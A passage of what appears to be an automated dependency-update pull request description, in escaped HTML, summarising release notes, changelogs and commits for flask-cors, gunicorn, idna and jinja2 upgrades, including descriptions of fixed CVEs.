href=\"https://github.com/corydolphin/flask-cors/compare/4.0.1...4.0.2\"\u003ehttps://github.com/corydolphin/flask-cors/compare/4.0.1...4.0.2\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/corydolphin/flask-cors/blob/main/CHANGELOG.md\"\u003eflask-cors's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChange Log\u003c/h1\u003e\n\u003ch2\u003e4.0.1\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAddress \u003ca href=\"https://github.com/advisories/GHSA-84pr-m4jr-85g5\"\u003eCVE-2024-1681\u003c/a\u003e which is a log injection vulnerability when the log level is set to debug by \u003ca href=\"https://github.com/aneshujevic\"\u003e\u003ccode\u003e@​aneshujevic\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/351\"\u003ecorydolphin/flask-cors#351\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.0.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove support for Python versions older than 3.8 by \u003ca href=\"https://github.com/WAKayser\"\u003e\u003ccode\u003e@​WAKayser\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/330\"\u003ecorydolphin/flask-cors#330\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd GHA tooling by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/331\"\u003ecorydolphin/flask-cors#331\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.01\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInclude examples to specify that schema and port must be included in … by \u003ca href=\"https://github.com/YPCrumble\"\u003e\u003ccode\u003e@​YPCrumble\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/294\"\u003ecorydolphin/flask-cors#294\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etwo small changes to the documentation, based on issue \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/290\"\u003e#290\u003c/a\u003e by \u003ca href=\"https://github.com/bbbart\"\u003e\u003ccode\u003e@​bbbart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/291\"\u003ecorydolphin/flask-cors#291\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typo by \u003ca href=\"https://github.com/sunarch\"\u003e\u003ccode\u003e@​sunarch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/304\"\u003ecorydolphin/flask-cors#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFIX: typo in CSRF by \u003ca href=\"https://github.com/sattamjh\"\u003e\u003ccode\u003e@​sattamjh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/315\"\u003ecorydolphin/flask-cors#315\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTest against recent Python versions by \u003ca href=\"https://github.com/pylipp\"\u003e\u003ccode\u003e@​pylipp\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/314\"\u003ecorydolphin/flask-cors#314\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCorrect spelling mistakes by \u003ca href=\"https://github.com/EdwardBetts\"\u003e\u003ccode\u003e@​EdwardBetts\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/311\"\u003ecorydolphin/flask-cors#311\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e'Access-Control-Allow-Private-Network = true' header for http response by \u003ca href=\"https://github.com/chelo-kjml\"\u003e\u003ccode\u003e@​chelo-kjml\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/318\"\u003ecorydolphin/flask-cors#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: Fix a few typos by \u003ca href=\"https://github.com/timgates42\"\u003e\u003ccode\u003e@​timgates42\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/323\"\u003ecorydolphin/flask-cors#323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Docs] Fix typo in configuration documentation by \u003ca href=\"https://github.com/sachit-shroff\"\u003e\u003ccode\u003e@​sachit-shroff\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/316\"\u003ecorydolphin/flask-cors#316\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.10\u003c/h2\u003e\n\u003cp\u003eAdds support for PPC64 and ARM64 builds for distribution. Thanks \u003ca href=\"https://github.com/sreekanth370\"\u003e\u003ccode\u003e@​sreekanth370\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.0.9\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEscape path before evaluating resource rules (thanks to Colby Morgan). Prior to this, flask-cors incorrectly\nevaluated CORS resource matching before path expansion. E.g. \u0026quot;/api/../foo.txt\u0026quot; would incorrectly match resources for\n\u0026quot;/api/*\u0026quot; whereas the path actually expands simply to \u0026quot;/foo.txt\u0026quot;\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.8\u003c/h2\u003e\n\u003cp\u003eFixes : DeprecationWarning: Using or importing the ABCs from 'collections' in Python 3.7.\nThank you \u003ca href=\"https://github.com/juanmaneo\"\u003e\u003ccode\u003e@​juanmaneo\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/jdevera\"\u003e\u003ccode\u003e@​jdevera\u003c/code\u003e\u003c/a\u003e for the contribution.\u003c/p\u003e\n\u003ch2\u003e3.0.7\u003c/h2\u003e\n\u003cp\u003eUpdated logging.warn to logging.warning (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/234\"\u003e#234\u003c/a\u003e) Thanks Vaibhav\u003c/p\u003e\n\u003ch2\u003e3.0.6\u003c/h2\u003e\n\u003cp\u003eManual error in release process. Identical contents at 3.0.5.\u003c/p\u003e\n\u003ch2\u003e3.0.5\u003c/h2\u003e\n\u003cp\u003eFixes incorrect handling of regexes containing \u003ccode\u003e[\u003c/code\u003e, and a few other special characters. Fixes Issue \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/212\"\u003e#212\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.0.4\u003c/h2\u003e\n\u003cp\u003eHandle response.headers being None. (Fixes issue \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/217\"\u003e#217\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/35d875319621bd129a38b2b823abf4a2f6cda536\"\u003e\u003ccode\u003e35d8753\u003c/code\u003e\u003c/a\u003e [CVE-2024-6844] Replace use of (urllib) unquote_plus with unquote for paths (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/e970988bea563e05e8b8f53fa7bcc134b5bf5c5f\"\u003e\u003ccode\u003ee970988\u003c/code\u003e\u003c/a\u003e [CVE-2024-6839] Sort Paths by Regex Specificity (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/391\"\u003e#391\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/eb39516a3c96b90d0ae5f51293972395ec3ef358\"\u003e\u003ccode\u003eeb39516\u003c/code\u003e\u003c/a\u003e [CVE-2024-6866] Case Sensitive Request Path Matching (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/390\"\u003e#390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/5da9be479b4fb203816bca9eb0cfb7add5eeceb5\"\u003e\u003ccode\u003e5da9be4\u003c/code\u003e\u003c/a\u003e Fix packaging: missing source files (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/381\"\u003e#381\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/65a51321e1be9a4320b39f67db5e63553cd8138b\"\u003e\u003ccode\u003e65a5132\u003c/code\u003e\u003c/a\u003e Workaround license publishing issue (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/380\"\u003e#380\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/7127e7e3914083fbe4ebd8f7ef9b3ae0e8459daa\"\u003e\u003ccode\u003e7127e7e\u003c/code\u003e\u003c/a\u003e Always use trusted publishing (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/379\"\u003e#379\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/01e2e68268f7fdb4ed7309a655986b85c9066a67\"\u003e\u003ccode\u003e01e2e68\u003c/code\u003e\u003c/a\u003e Fix release pipeline (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/378\"\u003e#378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/ade65a16524c628747aecaaa73c1d615501974b2\"\u003e\u003ccode\u003eade65a1\u003c/code\u003e\u003c/a\u003e Major Packaging Refactor: migrate to uv (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/377\"\u003e#377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/eb44bffc76f49e5bb8692e96a37e11ebee070cf0\"\u003e\u003ccode\u003eeb44bff\u003c/code\u003e\u003c/a\u003e fix: typos (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/371\"\u003e#371\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/corydolphin/flask-cors/commit/1225e7806156de61f343928c227e32bbff44059e\"\u003e\u003ccode\u003e1225e78\u003c/code\u003e\u003c/a\u003e replace documentation links in README (\u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/issues/369\"\u003e#369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/3.0.3...6.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gunicorn` from 19.7.1 to 23.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/benoitc/gunicorn/releases\"\u003egunicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e23.0.0\u003c/h2\u003e\n\u003cp\u003eGunicorn 23.0.0 has been released. This version improve HTTP 1.1. support and  which improve safety\u003c/p\u003e\n\u003cp\u003eYou're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003ch1\u003e23.0.0 - 2024-08-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eminor docs fixes (:pr:\u003ccode\u003e3217\u003c/code\u003e, :pr:\u003ccode\u003e3089\u003c/code\u003e, :pr:\u003ccode\u003e3167\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eworker_class parameter accepts a class (:pr:\u003ccode\u003e3079\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003efix deadlock if request terminated during chunked parsing (:pr:\u003ccode\u003e2688\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit receiving Transfer-Encodings: compress, deflate, gzip (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit Transfer-Encoding headers specifying multiple encodings. note: no parameters, still (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003esdist generation now explicitly excludes sphinx build folder (:pr:\u003ccode\u003e3257\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003edecode bytes-typed status (as can be passed by gevent) as utf-8 instead of raising \u003ccode\u003eTypeError\u003c/code\u003e (:pr:\u003ccode\u003e2336\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eraise correct Exception when encounting invalid chunked requests (:pr:\u003ccode\u003e3258\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003ethe SCRIPT_NAME and PATH_INFO headers, when received from allowed forwarders, are no longer restricted for containing an underscore (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003einclude IPv6 loopback address \u003ccode\u003e[::1]\u003c/code\u003e in default for :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e and :ref:\u003ccode\u003eproxy-allow-ips\u003c/code\u003e (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** NOTE **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SCRIPT_NAME change mitigates a regression that appeared first in the 22.0.0 release\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e setting if you are still not seeing the SCRIPT_NAME transmitted\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarder-headers\u003c/code\u003e setting if you are missing headers after upgrading from a version prior to 22.0.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** Breaking changes **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefuse requests where the uri field is empty (:pr:\u003ccode\u003e3255\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003erefuse requests with invalid CR/LR/NUL in heade field values (:pr:\u003ccode\u003e3253\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eremove temporary \u003ccode\u003e--tolerate-dangerous-framing\u003c/code\u003e switch from 22.0 (:pr:\u003ccode\u003e3260\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eIf any of the breaking changes affect you, be aware that now refused requests can post a security problem, especially so in setups involving request pipe-lining and/or proxies.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eFix CVE-2024-1135\u003c/p\u003e\n\u003ch2\u003eGunicorn 22.0 has been released\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eGunicorn 22.0.0 has been released.\u003c/strong\u003e This version fix the numerous security vulnerabilities. You're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003cp\u003eChanges:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e22.0.0 - 2024-04-17\n===================\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003eutime\u003c/code\u003e to notify workers liveness\u003c/li\u003e\n\u003cli\u003emigrate setup to pyproject.toml\u003c/li\u003e\n\u003cli\u003efix numerous security vulnerabilities in HTTP parser (closing some request smuggling vectors)\u003c/li\u003e\n\u003cli\u003eparsing additional requests is no longer attempted past unsupported request framing\u003c/li\u003e\n\u003cli\u003eon HTTP versions \u0026lt; 1.1 support for chunked transfer is refused (only used in exploits)\u003c/li\u003e\n\u003cli\u003erequests conflicting configured or passed SCRIPT_NAME now produce a verbose error\u003c/li\u003e\n\u003cli\u003eTrailer fields are no longer inspected for headers indicating secure scheme\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/411986d6191114dd1d1bbb9c72c948dbf0ef0425\"\u003e\u003ccode\u003e411986d\u003c/code\u003e\u003c/a\u003e fix doc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/334392e7795f2017e83f7054d372422512d6f4b6\"\u003e\u003ccode\u003e334392e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2559\"\u003e#2559\u003c/a\u003e from laggardkernel/bugfix/reexec-env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/e75c3533e32f91a9dceba9e8e1341fea5540ba81\"\u003e\u003ccode\u003ee75c353\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3189\"\u003e#3189\u003c/a\u003e from pajod/patch-py36\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/9357b28dd867950e33ca3864207cb35a1eb8ba6f\"\u003e\u003ccode\u003e9357b28\u003c/code\u003e\u003c/a\u003e keep document user in access_log_format setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/79fdef0822cbfe7e16b659b07230af9be098d5fc\"\u003e\u003ccode\u003e79fdef0\u003c/code\u003e\u003c/a\u003e bump to 23.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/3acd9fbfd1159ca3cd80a8052ada89a0bf27f806\"\u003e\u003ccode\u003e3acd9fb\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2620\"\u003e#2620\u003c/a\u003e from talkerbox/improve-access-log-format-docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/3f56d76548e4ade034bf5e174737902970285d1f\"\u003e\u003ccode\u003e3f56d76\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3192\"\u003e#3192\u003c/a\u003e from pajod/patch-allowed-script-name\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/256d474a7910bd605f2cc8c082b79c1ae55215a9\"\u003e\u003ccode\u003e256d474\u003c/code\u003e\u003c/a\u003e docs: revert duped directive\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/ffa48b581dcaa75f17fd2df263515e4266feeef6\"\u003e\u003ccode\u003effa48b5\u003c/code\u003e\u003c/a\u003e test: default change was intentional\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/52538ca9070b5e7ead5d0fa731e82a622dc6f3ee\"\u003e\u003ccode\u003e52538ca\u003c/code\u003e\u003c/a\u003e docs: recommend SCRIPT_NAME=/subfolder\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/benoitc/gunicorn/compare/19.7.1...23.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.6 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.6...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.10.1 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca 